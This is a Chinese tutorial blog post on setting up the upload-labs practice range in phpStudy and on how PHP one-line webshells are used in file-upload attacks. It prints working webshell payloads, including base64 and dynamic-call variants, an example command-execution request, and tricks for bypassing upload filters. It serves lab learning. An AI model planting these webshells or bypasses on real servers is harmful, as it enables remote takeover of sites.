Upload-labs 靶场搭建 及一句话木马的原理与运用

news2025/4/3 1:41:32

1、phpstudy及upload-labs下载

(1)下载phpstudy小皮面板

首先需要软件phpstudy  下载地址 phpStudy下载-phpStudy最新版下载V8.1.1.3 -阔思亮

(2)然后到github网址下载源码压缩包

网址 https://github.com/c0ny1/upload-labs

下载压缩包

 下载好后解压缩到phpstudy的www目录下(注意,如果解压出现警告添加信任即可)

这里记得改一下解压缩后的文件夹名字(主要是为了方便后面搭建网址方便一些,没有那么麻烦),就设置为upload-labs即可,或者直接upload。以防万一后面靶场名字显示出问题

 

2、环境搭建

然后打开phpstudy

开启apachmysql服务器

 然后进入网站,检查localhost根目录是不是在phpstudywww目录下

检查过后点击创建网站

这里一定要选择www目录下的upload-labs,然后再设置域名为127.0.0.1   端口随便设置一个没被占用的即可,这里我设置了8088

设置完后点击确定即可。然后点击管理,打开网址

就可以看到域名为127.0.0.1,端口为8088的upload-labs靶场搭建成功

3、靶场搭建问题

(1)服务器未开启

如果在打开网站时,出现下面这种情况的提示

那就说明网站所需要的服务器(如apachemysql没开启已关机,需要进入 首页手动启用服务器

     关闭状态:

开启就可以打开了:

 

(2)根目录问题

这里说一下为什么创建网站的目录要到www目录下的upload-labs文件夹

因为我们下载的upload-labs这些文件是为靶场准备的,如果不选择到upload-labs目录,它相当于没有材料就建不了房子的,就会只创建站点(也就相当于建房的地基

不信做个示范,注意这里的根目录霍,只选择到www目录就直接创建127.0.0.1,看看会创建出什么样的页面

确认后打开网站

看吧,没有建房材料就只有地基(毕竟我们选择的目录只到www,想要构建upload-labs靶场的“房子”它是没有办法在根目录上找到uploads-labs,因为127.0.0.1的域名创建到了upload-labs文件的上一级,它找不到啊)

所以根目录是www目录下还要再加upload-labs

这样它在upload-labs目录下才能找到upload-labs文件

upload-labs靶场才能搭建成功

(3)端口占用

至于端口被占用的话,是这种情况

8080的端口,打开网站后

端口就可以了

换8088的端口打开网站后靶场正常

4、文件上传漏洞中一句话木马的原理及运用

(1)木马的概念

木马:能够获取对方控制权限程序

分类:(远控)exeweb木马phpjspasp

一般文件上传中利用的一句话就是php代码的木马,而我前两天学的msf制作windows病毒实战渗透制作的就是exe

kali利用msf渗透Windows电脑测试-CSDN博客

(2)漏洞利用原理

<1>文件上传缺陷

攻击者利用未严格校验上传文件的后端逻辑(如未检查文件类型内容后缀等),将包含恶意代码的文件(如PHPASPJSP等)上传至服务器

<2>绕过防护机制

通过以下方式绕过常见防护:

(1)伪造文件类型

修改HTTP头中的Content-Type(如image/png伪装成合法文件

(2)修改文件后缀

如将.php改为.php5、.phtml或结合服务端解析漏洞(如Apachetest.php.jpg).

(3)文件内容混淆

在图片文件中插入恶意代码(图片马),利用服务器对文件内容的信任

<3>木马执行

(3)一句话木马的工作原理

这里我尝试自己搭了个靶场,但不太好用,就不用了(upload-labs留着后面系统而全面的学)

<1>典例
<?php @eval($_POST['cmd']); ?>

 eval函数

将字符串作为PHP代码执行

$*POST['cmd'] :

接收客户端通过POST请求发送名为cmd的参数值

@  :

抑制错误提示,增强隐蔽性 (这个不太理解)

<2>木马执行流程
(1)上传恶意代码

攻击者利用上传包含上述代码的恶意文件(如shell.php)到服务器

(2)构造请求,发送数据

通过工具(如中国菜刀中国蚁剑Cknife)或手动构造HTTP请求,向shell.php发送POST数据

POST /uploads/shell.php HTTP/1.1
     ...
     cmd=system("whoami");
(3)服务端执行

eval("system('whoami');")返回命令执行结果

<3>高级变变种
(1)加密绕过

对代码进行base64AES加密,规避WAF检测

<?php @eval(base64_decode($_POST['cmd'])); ?>
(2)动态函数调用
<?php $_GET['a']($_GET['b']); ?>

通过URL参数动态执行代码:/shell.php?a=system&b=id

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2326168.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

爬虫的第三天——爬动态网页

一、基本概念 动态网页是指网页内容可以根据用户的操作或者预设条件而实时发生变化的网页。 特点&#xff1a; 用户交互&#xff1a;动态网页能够根据用户的请求而生成不同的内容。内容动态生成&#xff1a;数据来自数据库、API或用户输入。客户端动态渲染&#xff1a;浏览器…

力扣HOT100之矩阵:48. 旋转图像

这道题本来想用剥洋葱的办法的&#xff0c;一直写不对&#xff0c;放弃了。。。直接去看题解&#xff0c;用剥洋葱其实也可以做&#xff0c;就是要从外层处理到内层&#xff0c;每一个边界上的元素为matrix[0].size() - 1个&#xff0c;这样一来&#xff0c;四条边界上的元素个…

uniapp微信小程序获取用户手机号uniCloud云开发版

开发微信小程序&#xff0c;很多时候需要获取用户的手机号&#xff0c;这样方便平台更好的为用户服务&#xff0c;但是微信小程序不允许开发者直接获取用户的手机号&#xff0c;需要用户手动授权才能获取手机号&#xff0c;且需要配合后端进行解密才能获得完整的手机号&#xf…

31天Python入门——第18天:面向对象三大特性·封装继承多态

你好&#xff0c;我是安然无虞。 文章目录 面向对象三大特性1. 封装2. 继承3. 多态4. 抽象基类5. 补充练习 面向对象三大特性 面向对象编程&#xff08;Object-Oriented Programming, 简称OOP&#xff09;有三大特性, 分别是封装、继承和多态.这些特性是面向对象编程的基础, …

第十六届蓝桥杯模拟二(串口通信)

由硬件框图可以知道我们要配置LED 和按键 一.LED 先配置LED的八个引脚为GPIO_OutPut,锁存器PD2也是,然后都设置为起始高电平,生成代码时还要去解决引脚冲突问题 二.按键 按键配置,由原理图按键所对引脚要GPIO_Input 生成代码,在文件夹中添加code文件夹,code中添加fun.…

UE5学习笔记 FPS游戏制作32 主菜单,暂停游戏,显示鼠标指针

文章目录 一主菜单搭建UI显示主菜单时&#xff0c;暂停游戏&#xff0c;显示鼠标绑定按钮 二 打开主菜单 一主菜单 搭建UI 添加一个MainUi的控件 添加一个返回游戏的按钮和一个退出游戏的按钮 修改一下样式&#xff0c;放中间 显示主菜单时&#xff0c;暂停游戏&#xff0…

LLM - 开源强化学习框架 OpenR1 的环境配置与训练参数 教程

欢迎关注我的CSDN:https://spike.blog.csdn.net/ 本文地址:https://spike.blog.csdn.net/article/details/146838740 免责声明:本文来源于个人知识与公开资料,仅用于学术交流,欢迎讨论,不支持转载。 OpenR1 是一个开源的强化学习框架,复现 DeepSeek-R1 的训练流程,为研…

蓝桥杯备赛之枚举

用循环等方式依次去枚举所有的数字组合&#xff0c;一一验证是否符合题目的要求 题目链接 0好数 - 蓝桥云课 题目解析 好数的概念: 数的奇数位位奇数,偶数位为偶数,就是一个好数 求输入n里面有多少个好数 题目原理 1> 遍历每个数 2> 每次遍历判断是不是好数 把这…

C++编程语言:抽象机制:一个矩阵的设计(Bjarne Stroustrup)

第29章 一个矩阵的设计(A Matrix Design) 目录 29.1 引言 29.1.1 基本的 Matrix 用法 29.1.2 Matrix 的要求 29.2 一个 Matrix 模板 29.2.1 构造和赋值(Construction and Assignment) 29.2.2 下标和分片(Subscripting and Slicing) 29.3 Matrix算术运算(Matrix…

MSYS2学习笔记

前言 本文内容是MSys2 Documentation的学习笔记可以使用MSYS2编译QGis 学习笔记 什么是MSYS2&#xff1f; MSYS2&#xff08;Minimal System 2&#xff09;是一个为Windows平台打造的软件开发环境和包管理系统&#xff0c;它结合了Cygwin的POSIX兼容层、Arch Linux的pacman…

合规+增效 正也科技携智能营销产品出席中睿论坛

正也科技作为医药数字化领域的标杆企业&#xff0c;受邀参展第二届中睿医健产业企业家年会暨第十三届中睿医药新春论坛&#xff0c;本次论坛以“合力启新程”为主题&#xff0c;吸引了800多位医药健康企业的董事长、总经理参与&#xff0c;并通过主论坛、分论坛、路演等形式探讨…

计算机网络 TCP/IP参考模型

目录 TCP IP模型预览 OSI和TCP的相同点 OSI和TCP的不同点 层参考模型 层参考模型的数据封装与解封装 TCP IP模型预览 OSI和TCP的相同点 OSI和TCP的不同点 层参考模型 层参考模型的数据封装与解封装

JSON的基础知识

文章目录 前言json协议的基本格式json 数组类型 的语法规则json协议报文的实例json常见的一些格式错误在gd32中使用cjson库小结 前言 json协议在互联网应用&#xff0c;物联网应用中都会用到。所谓工欲善其事必先利其器&#xff0c;我们需要学习了解json协议的具体格式&#xf…

区间预测 | MATLAB实现QRBiGRU门控循环单元分位数回归时间序列区间预测

区间预测 | MATLAB实现QRBiGRU门控循环单元分位数回归时间序列区间预测 目录 区间预测 | MATLAB实现QRBiGRU门控循环单元分位数回归时间序列区间预测效果一览基本介绍模型描述程序设计参考资料 效果一览 基本介绍 区间预测 | MATLAB实现QRBiGRU门控循环单元分位数回归时间序列区…

11 配置Hadoop集群-免密登录

第一课时 一、复习导入 前面的课程中我们在虚拟机上安装并测试使用了hadoop的示例程序wordcount&#xff0c;并且在准备好了集群的同步工具&#xff0c;那接下来&#xff0c;我们就可去配置hadoop集群了。 二、授新 &#xff08;一&#xff09;认识ssh命令 SSH&#xff08;Secu…

13 配置Hadoop集群-测试使用

第一课时 一、导入 前面的课程我们搭建了hadoop集群&#xff0c;并成功启动了它&#xff0c;接下来我们看看如何去使用集群。 测试的内容包括&#xff1a;1.上传文件&#xff0c;2.下载文件&#xff0c;3.运行程序 二、授新 &#xff08;一&#xff09;上传小文件 上传文件的时…

简单ELK框架搭建

简介 ELK 框架是一套开源的日志管理和分析工具&#xff0c;由 Elasticsearch、Logstash 和 Kibana 三个主要组件组成&#xff0c;现在新增了Filebeat组件&#xff0c;可以更高效的收集数据。 Elasticsearch&#xff1a;是一个分布式、高可扩展的开源搜索引擎&#xff0c;能快速…

Vue2和Vue3响应式的基本实现

目录 简介Vue2 响应式Vue2 响应式的局限性 Vue3 响应式Vue3 响应式的优点 Vue2 和 Vue3 响应式对比 简介 在 Vue 框架中&#xff0c;数据的响应式是其核心特性之一。当页面数据发生变化时&#xff0c;我们希望界面能自动更新&#xff0c;而不是手动操作 DOM。这就需要对数据进…

RCE(自增、取反、异或)

自增: 也就是说&#xff0c;a > b&#xff0c;b > c... 所以&#xff0c;我们只要能拿到一个变量&#xff0c;其值为a&#xff0c;通过自增操作即可获得a-z中所有字符。 无字母数字构造&#xff1a; 所有敏感字符串&#xff08;ASSERT、_POST&#xff09;通过自增动态生…

【深度学习新浪潮】图像修复(Image Inpainting)技术综述:定义、进展与应用展望

本文为精简版,完整技术细节与参考文献可与作者讨论。 1. 图像修复的定义与核心目标 图像修复(Image Inpainting)是一种通过算法手段填补图像中缺失区域或移除不需要对象的技术,其核心目标是利用图像上下文信息生成与周围像素一致且视觉自然的内容。该技术通过计算机视觉和…